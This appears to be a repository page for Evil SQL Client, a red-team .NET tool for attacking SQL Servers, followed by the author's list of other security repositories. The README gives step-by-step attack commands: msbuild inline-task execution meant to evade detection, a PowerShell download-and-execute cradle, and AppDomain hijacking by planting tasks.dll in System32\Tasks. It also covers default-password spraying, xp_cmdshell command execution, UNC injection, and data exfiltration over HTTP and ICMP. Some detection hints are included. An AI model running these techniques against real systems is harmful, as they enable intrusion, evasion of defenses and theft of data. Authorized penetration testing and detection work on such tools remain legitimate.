• Stars
    star
    278
  • Rank 148,454 (Top 3 %)
  • Language
    C#
  • License
    Other
  • Created over 4 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.

evilsqlclient

--------------------------
Evil SQL Client (ESC)
Version: v1.0
Author: Scott Sutherland (@_nullbind), NetSPI 2020

Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting Active Directory domain joined SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.

Most of ESC's functionality is based on the PowerUpSQL, DAFT, SQLC2, and SQLInjectionWiki projects which are also related to SQL Server. At the moment ESC does not have full feature parity with the PowerUpSQL or DAFT, but the most useful bits are there.

Below is a summary of what is covered in this readme:

Execution Options

Command Options

Detections

  • MSBuild Tests: Resource1
  • MSBuild Detection: Resource1 | Resource2
  • SQL Server Detection: Resource1
  • AppDomain Detection - Consider monitoring for tasks.dll being written to c:\Windows\SysWow64\Tasks\ and c:\Windows\System32\Tasks, affected files being copied out of system and program file directories, or the "APPDOMAIN_MANAGER_TYPE" and "COMPLUS_Version" environmental variables being set via the command line or via scripting engines. Disclaimer: I haven't tested the AppDomain detections on scale so I dont know how much white noise they will produce.

Execution Options

Below is a list of options for running the Evil SQl Client (ESC).

Compile Source and Run Exe

  1. Download the source from esc folder.
  2. Open the esc.sln file in Visual Studio.
  3. Select Build -> Build Solution.
  4. Run esc.exe.

buildesc

Download Release and Run Exe

  1. Download compiled esc.exe from releases.
  2. Run esc.exe.

runescexe

Download and Run through MSbuild.exe

Evil SQL Client console can be run through msbuild inline tasks using the esc.csproj file or esc.xml file.
Using msbuild.exe to execute .net code through inline tasks is a technique that was researched and popularized by Casey Smith.

esc.proj
esc.proj includes all of the original Evil SQL Client (ESC) C Sharp source code inline. The inline .NET source code technique used in this variation seems to do a better job of avoiding detection than embedding the exe and calling through reflection.

esc.xml
esc.xml works a little differently and has the entire esc.exe hardcoded as a string which is then loaded through reflection using a technique highlighted in the GhostBuild project by @bohops. I should note that Windows Defender is pretty good at identifying this exe wrapping technique out of the box.

Updating esc.xml:
To update the esc.xml follow the instructions below:

  1. Download and compile esc.exe.
  2. Run Out-Compressdll (by @mattifestation) against esc.exe.
    Out-CompressedDll -FilePath esc.exe | out-file output.txt
  3. Replace the compressedBin string in esc.xml with the "EncodedCompressedFile" string generated from Out-CompressDll.
  4. Replace compressedBinSize with the size generated from Out-CompressDll.
  5. Run the script.
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.xml

Execution Examples
Below are a few execution examples. Msbuild can accept a filepath on the command line, but no filepath is required if only one .csproj file exists in the directory your executing msbuild.exe from.

In the examples below, esc.csproj has been renamed to 1.csproj:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
runescexe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.csproj
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.xml
runescexe

Download and Run Functions through PowerShell

Below are some quick instructions for running ESC functions through PowerShell.

  1. Download esc.exe.
  2. Open PowerShell and load esc.exe through reflection.
    [System.Reflection.Assembly]::LoadFile("c:\temp\esc.exe")
  3. Alternatively, esc-example.ps1 contains a portable example generated using Out-Compressdll. It can be loaded using the PowerShell command below.
    IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/ESC/master/esc-example.ps1")
  4. After the assmbly is loaded you can run the desired function. Examples below.
[evilsqlclient.Program+EvilCommands]::GetSQLServersBroadCast()
[evilsqlclient.Program+EvilCommands]::GetSQLServersSpn()
[evilsqlclient.Program+EvilCommands]::MasterDiscoveredList
[evilsqlclient.Program+EvilCommands]::InstanceAllG = "enabled"
[evilsqlclient.Program+EvilCommands]::CheckAccess()
[evilsqlclient.Program+EvilCommands]::MasterAccessList
[evilsqlclient.Program+EvilCommands]::CheckDefaultAppPw()
[evilsqlclient.Program+EvilCommands]::CheckLoginAsPw()
[evilsqlclient.Program+EvilCommands]::MasterAccessList

Download and Run through AppDomain Hijacking

Application domains provide an isolation boundary for security, reliability, and versioning, and for unloading .NET assemblies. Application domains are typically created by runtime hosts, which are responsible for bootstrapping the common language runtime before an application is run. A typical application loads several assemblies into an application domain before the code they contain can be executed. The default AppDomainManager can be replaced by setting the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environmental variables. This provides users with the means load and execute .NET code from custom assemblies prior to the execution of the intended application, but within their process and thread.

Reference: https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains

It is possible to leverage that functionality and default write access to the c:\windows\system32\tasks\ directory to execute arbitrary .NET code through c:\windows\system32\ and c:\windows\SysWow64\ assemblies that import mscoree.dll. This technique was originally shared during Casey Smith's DerbyCon presentation ".Net Manifesto - Win Friends and Influence the Loader".

Below are instructions for executing ESC using this method.

  1. Compile esc-appdomain-hijack.cs to tasks.dll.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.Reflection.dll /r:System.IO.Compression.dll /r:System.Runtime.InteropServices.dll /r:System.EnterpriseServices.dll /target:library /out:tasks.dll esc-appdomain-hijack.cs			
  1. Update environment variables. Note: process, user, or system could be targeted.
set APPDOMAIN_MANAGER_ASM=tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
set APPDOMAIN_MANAGER_TYPE=Esc
set COMPLUS_Version=v4.0.30319
  1. Copy tasks.dll to target directories.
copy tasks.dll C:\Windows\System32\Tasks\tasks.dll 
copy tasks.dll C:\Windows\SysWow64\Tasks\tasks.dll
  1. Identify .exe in c:\windows\system32\ that load mscoreee.dll. This can be done quickly using the Get-PE function from Matt Graeber's PowerShell Arsenal Project.
gci c:\windows\system32\*.exe | get-pe | where-object {$_.Imports.ModuleName -Contains "mscoree.dll"} | Select ModuleName -ExpandProperty modulename
  1. Choose one of the affected commands and run it.
Examples:
C:\windows\system32\acu.exe
C:\windows\system32\aitstatic.exe
C:\windows\system32\ClusterUpdateUI.exe
C:\windows\system32\dsac.exe
C:\windows\system32\FileHistory.exe
C:\windows\system32\LbfoAdmin.exe
C:\windows\system32\Microsoft.Uev.SyncController.exe
C:\windows\system32\mtedit.exe
C:\windows\system32\PresentationHost.exe
C:\windows\system32\RAMgmtUI.exe
C:\windows\system32\ScriptRunner.exe
C:\windows\system32\ServerManager.exe
C:\windows\system32\ShieldingDataFileWizard.exe
C:\windows\system32\stordiag.exe
C:\windows\system32\SynapticsUtility.exe
C:\windows\system32\TemplateDiskWizard.exe
C:\windows\system32\TsWpfWrp.exe
C:\windows\system32\UevAgentPolicyGenerator.exe
C:\windows\system32\UevAppMonitor.exe
C:\windows\system32\UevTemplateBaselineGenerator.exe
C:\windows\system32\UevTemplateConfigItemGenerator.exe
C:\windows\system32\Vmw.exe

runappdomain

This can also be done by copying the affected EXE and the tasks.dll to a directory that's writable by the user. To detect those scenarios, consider monitoring for files being copied from system directories. However, note that attackers may be able to identify other affected EXEs on the system using the same discovery technique listed above.

runappdomain

Using the steps below ESC can also be executed using cscript.exe once the tasks.dll has been written to disk. Once again, based on Casey Smith's templates.

  1. Create the file trigger.js with the content below.
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'c:\\Windows\\System32\\Tasks';
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = 'tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null';
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = 'Esc';
var o = new ActiveXObject("System.Object"); 
  1. Execute it using cscript.exe.
cscript trigger.js

runappdomain2

Note: Detections could include monitoring for tasks.dll being written to C:\Windows\System32\Tasks\tasks.dll and C:\Windows\SysWow64\Tasks\tasks.dll. Also, potentially the execution of the commands above without/with parameters.

ESC can also be executed through AppDomain hijacking using a configuration file.

  1. Create a configuration file in same folder as the target assembly, and name it after the target binary. Example below.
ScriptRunner.exe.config
  1. Below is sample XML for the config file.
<configuration>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<probing privatePath="C:\Windows\Tasks"/> </assemblyBinding>
<appDomainManagerAssembly value="Tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" />
<appDomainManagerType value="Esc" />
</runtime>
</configuration>
  1. Run the target binary.
ScriptRunner.exe

Note: Alternatively, the assemblyBinding and probing tags can be removed from the configuration file and replaced with the tag within the runtime tag. If that tag is present in the configuration file, the .NET application will attempt to use the DEVPATH environmental variable as a search path for referenced assemblies. As such, it can be used as an alternative to probing.

Reference: https://learn.microsoft.com/en-us/dotnet/framework/configure-apps/how-to-locate-assemblies-by-using-devpath

Supported Commands

COMMAND LIST

    SHOW:
     show settings 			Show connection and exfil settings.
     show discovered 			Show discovered instances. 
     show access  			Show accessible instances, versions, and other information.
     show help 				Show this help page.
 
    CONFIGURE INSTANCE:
     set targetall			Target all accessible SQL Server instances. List with 'show access' command.
     set instance instancename		Target a single instance.  Instance formats supported include: 
 				    	server1
 				    	server1\instance1
 				    	server1,1433
     set connstring stringhere 		Set a custom connection string. Examples below.
				   	 Server=Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1
				    	Server=Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1;uid=Domain\Account;pwd=Password;
				    	Server=Server\Instance;Database=Master;Connection Timeout=1;User ID=Username;Password=Password
 
    CONFIGURE CREDENTIALS:
     set username username 		User for authenticatiing to SQL Server instances.
 				   	Defaults to current Windows user if no username or password is provided, but access SQL Login credentials.
     set password password		Password for the provided username.  
 				    	Defaults to current Windows user if no user or password is provided.
 
    QUERY COMMANDS:
     set timeout 1			Set query timeout. Useful over slow connections.
     query				Arbitrary TSQL query can be executed once a valid connection string is configured.
				    	To run against all accessible instances type 'set targetall enabled'.
				    	Type the query, then go, and press enter. Multi-line queries are supported.
				    	Note: You don't have to type the word 'query'.
				    	Example:
				    	SELECT @@VERSION
				    	GO
 
    DISCOVERY COMMANDS:
     discover broadcast			Discover SQL Server instances via a broadcast request.
     discover domainspn			Discover SQL Server instances via LDAP query to the default DC for MSSQL SPNs.
     discover file filepath		Discover SQL Server instance listed in a file.  One per line.
				    	Format examples: 
				    	hostname 
				    	hostname\instance
				    	hostname,port
     show discovered			Display the list of discovered SQL Server instances.
     export discovered outpath		Export the list of discovered SQL Server instances to a file. 
				   	 Example: export discovered c:\windows\temp\sqlinstances.txt
     clear discovered			Clear list of discovered SQL Server instances.

    INITAL ACCESS COMMANDS:
     check access			Attempts to log into all discovered SQL Server instances.  
 				    	Uses current Windows/Domain user by default. 
				    	Note: Will use alternative credentials if provided. (set username / set password)
     show access			List SQL Server instances that can be logged into.
     export access outpath		Export list of SQL Server instances that can be logged into to a file.
     clear access			Clear the in memory list of SQL Server instances that can be logged into.			
     check defaultlogins		Attempts to identify SQL Server instances that match known application and attempts the associate usernames and passwords.


    POST EXPLOITATION COMMANDS:
     list serverinfo			List server information for accessoble target SQL Server instances.
     list databases			List databases for accessoble target SQL Server instances.
     list tables			List tables information for accessoble target SQL Server instances.
  				    	Limits results to databases the login user has access to.
     list links				List links information for accessoble target SQL Server instances.
     list logins			List logins information for accessoble target SQL Server instances.
     list rolemembers			List rolemember information for accessoble target SQL Server instances.
     list privs				Check accessible target SQL Server instances for logins that use their login as a password.  
     check loginaspw     		Check accessible target SQL Server instances for logins that use their login as a password.                         
     check uncinject IP			Connect to taret SQL Server instance and perform UNC injection back to provide IP.	     
     run OSCMD command			Run os command through xp_cmdshell on the accessible target SQL Server instances. 
 				    	*Requires sysadmin privileges.
 
    CONFIGURE DATA EXFILTRATION: 
     set file enabled
     set filepath c:\temp\file.csv
     set icmp tenabled
     set icmpip 127.0.0.1
     set http enabled
     set httpurl http://127.0.0.1
     set encrypt enabled
     set enckey MyKey!
     set encsalt MySalt!

    MISC COMMANDS:
     help
     clear
     exit
 

Common Command Sequences

Below are some common command examples to get you started.

Discovering SQL Server Instances
Below are a few common methods to identify SQL Server on the network and domain without port scanning.

discover domainspn examplescenario

discover broadcast examplescenario

show discovered examplescenario

Checking Access to Discovered Instances
After discovery, check access can be used to determine if the current or provided credentials can login into the discovered SQL Server instances.

set targetall enabled
show settings examplescenario

check access examplescenario

show access examplescenario

Query Single Target
Below are commands that can be used to target and query a single SQL Server instance.

First configure ESC to target a single instance. This will automatically disable the "targetall" setting.

Set target MSSQLSRV04\SQLSERVER2014
Set username backdoor_account
Set password backdoor_account
Show settings
examplescenario

Next simply execute your query and end your TSQL with the keyword "go".

select @@version
go
examplescenario

You can also run "list" and other post exploitation commands against the target instance.

examplescenario

Query Multiple Targets
Below are commands that can be used to target and query all accessible SQL Server instances.

  1. Import a list of target instances with the discover file, discover domainspn, or discover broadcast commands.
  2. Identify which instances you can log into.
    check access
  3. Enable multi instance targeting using the command below. Once enabled all commands and queries will be run against all accessible SQL Server instances.

    set targetall enabled
    show settings
  4. Run query as normal.
    select @@version
    go

Testing for Common Password Issues
Below are some checks for common password issues that can be used to gain initial entry and escalate privileges in some environments. If "targetall" is enabled the commands below with target all discovered or accessible instances. However, if a single instance is provided, then "targetall" will automatically be disabled to ensure only the one instance is targeted.

check defaultpw
check defaultpw is run against discovered instances and does not require valid credentials.
Related Reading
examplescenario

check loginaspw
check loginaspw can be used once authenticated to enumerated all logins and test if they are using the login as the password.
Related Reading
examplescenario
examplescenario

Running OS Commands
Below is a ESC command for running OS commands on target instances. It requires sysadmin privileges.

run oscmd whoami
examplescenario

Saving List of Accessible Servers
The command below can be used to export a list of servers that you can log into.
export access c:\temp\access.csv
examplescenario
examplescenario

Data Exfiltration Example: Local File
Below is an example of how to exfiltrate data to a local file.

set file enabled
set filepath c:\temp\output.csv examplescenario

select @@version examplescenario
examplescenario

Data Exfiltration Example: ICMP
Below is an example of how to exfiltrate data over ICMP with ESC.

set icmp enabled
set icmpip 192.168.1.1 examplescenario

select @@version examplescenario
examplescenario

Pending Commands

  • Add logging w/ timestamps
  • Add discover local
  • Add discover udpscan
  • Add column find
  • Add domain account enumeration
  • Add link crawl + linkquery + linkoscmd
  • Add escalate dbowner
  • Add escalate imperonsate
  • Threading
  • Finish data encryption
  • Create python/powershell script to decrypt encrypted exfiltrated data
  • Rewrite query function to be more flexible

Pending fixes

  • Crashes when you just type go
  • Crashes when you type ctrl+c

Thank You

Below is a list of people who tested out esc and/or provided .net development guidance. Thanks for all the help!

  • Alexander Leary (@0xbadjuju)
  • Ivan Da Silva (@humble_desser)
  • Josh Weber
  • Kevin Robertson (@kevin_robertson)

More Repositories

1

PowerUpSQL

PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server
PowerShell
2,444
star
2

MicroBurst

A collection of scripts for assessing Microsoft Azure security
PowerShell
1,982
star
3

SQLInjectionWiki

A wiki focusing on aggregating and documenting various SQL injection methods
HTML
727
star
4

PESecurity

PowerShell module to check if a Windows binary (EXE/DLL) has been compiled with ASLR, DEP, SafeSEH, StrongNaming, and Authenticode.
PowerShell
593
star
5

PowerHuntShares

PowerHuntShares is an audit script designed in inventory, analyze, and report excessive privileges configured on Active Directory domains.
PowerShell
555
star
6

xssValidator

This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities.
Java
399
star
7

NetblockTool

Find netblocks owned by a company
Python
336
star
8

PowerShell

NetSPI PowerShell Scripts
PowerShell
300
star
9

WebLogicPasswordDecryptor

PowerShell script and Java code to decrypt WebLogic passwords
Java
240
star
10

sshkey-grab

Grab ssh keys from ssh-agent
Python
217
star
11

JavaSerialKiller

Burp extension to perform Java Deserialization Attacks
Java
205
star
12

django.nV

Vulnerable Django Application
JavaScript
197
star
13

Wsdler

WSDL Parser extension for Burp
Java
189
star
14

Swift.nV

Security Training Tool that demonstrates common mobile application vulnerabilities using Swift in iOS
Swift
180
star
15

aws_consoler

A utility to convert your AWS CLI credentials into AWS console access.
Python
178
star
16

DAFT

DAFT: Database Audit Framework & Toolkit
C#
173
star
17

Powershell-Modules

PowerShell
158
star
18

Burp-Extensions

Central Repo for Burp extensions
Java
141
star
19

BurpCollaboratorDNSTunnel

A DNS tunnel utilizing the Burp Collaborator
Java
97
star
20

BetaFast

Vulnerable thick client applications used as examples in the Introduction to Hacking Desktop Applications blog series
C#
89
star
21

BurpExtractor

A Burp extension for generic extraction and reuse of data within HTTP requests and responses.
Java
89
star
22

AWSSigner

Burp Extension for AWS Signing
Java
86
star
23

AutoDirbuster

Automatically run and save ffuf scans for multiple IPs
Python
74
star
24

SQLC2

SQLC2 is a PowerShell script for deploying and managing a command and control system that uses SQL Server as both the control server and the agent.
PowerShell
72
star
25

PowerHunt

PowerHunt is a modular threat hunting framework written in PowerShell that leverages PowerShell Remoting for data collection on scale.
PowerShell
61
star
26

FuncoPop

Tools for attacking Azure Function Apps
PowerShell
60
star
27

MonkeyWorks

C#
58
star
28

cmdsql

ASP.NET
54
star
29

heapdump-ios

Dump IOS application heap space from memory
Shell
50
star
30

SpoofSpotter

A tool to catch spoofed NBNS responses.
Python
49
star
31

skl

strace keylogger PoC
44
star
32

grails-nV

Vulnerable Grails application
JavaScript
43
star
33

JSONBeautifier

JSON Beautifier for Burp written in Java
Java
36
star
34

asa_tools

Verification tools for CVE-2016-1287
Python
32
star
35

MoneyX

MoneyX is an intentionally vulnerable JSP application used for training developers in application security concepts.
Java
30
star
36

JIG

Jira Information Gatherer
Python
29
star
37

httpillage

Java
26
star
38

HTTPScrapers

NetSPI HTTP Scrapers
Python
25
star
39

binrev

Shell
24
star
40

crossdomainscanner

Python tool for expired domain discovery in crossdomain.xml files
Python
23
star
41

goat.js

Tutorial for Node.js security
CSS
20
star
42

PS_Reflector

PowerShell
19
star
43

PS_MultiCrack

A powershell script for cracking halfLMchall password hashes
PowerShell
19
star
44

PS_CC_Checker

PowerShell
17
star
45

DataLoc

Scan MSSQL databases for payment card data without relying on key words
AutoIt
16
star
46

silkwasm

HTML Smuggling with Web Assembly
Go
15
star
47

Pin

Intel pin tools
C++
12
star
48

ruby_apk_unpack

Ruby Gem to Unpack APK(s)
Ruby
12
star
49

SVNentriesParser

A powershell script to parse SVN entries files into an HTML directory listing
PowerShell
9
star
50

Dekrypto

Ruby
8
star
51

JSWS

JavaScript Web Service Proxy Burp Plugin
Java
7
star
52

gppdecrypt

Stand alone script to decrypt GPP cpassword.
Go
7
star
53

TapJacking-Demo

Java
6
star
54

WCF

C#
6
star
55

PycroBurst

Python implementation of select MicroBurst scripts.
Python
6
star
56

Custom-Passive-Scanner

Define custom findings for Burp's Passive Scanner using regex.
Java
5
star
57

doctordocker

Docker Doctor - Automated upgrading of libraries through Docker deployments.
Ruby
5
star
58

osint_scripts

Collection of Scripts of Open Source Intelligence Gathering
Ruby
5
star
59

npm-deps-parser

Parses, summarizes, and prints "npm audit" json output to markdown for nVision reports
Python
4
star
60

DetectionRules

This is a single location to store detection rules of various types.
4
star
61

Scheduled-Task

Native Binary for Creating a Scheduled Task
C++
2
star
62

rails-scope

scoping gem for rails application
Ruby
2
star
63

CollegePresentation

2
star
64

edge-cases-in-web

PHP
1
star
65

brigade-security-scripts

Brigade scripts to perform common Kubernetes and container-level security checks triggered by events.
1
star
66

WikiJekyllTheme

Wiki theme for various NetSPI wikis
HTML
1
star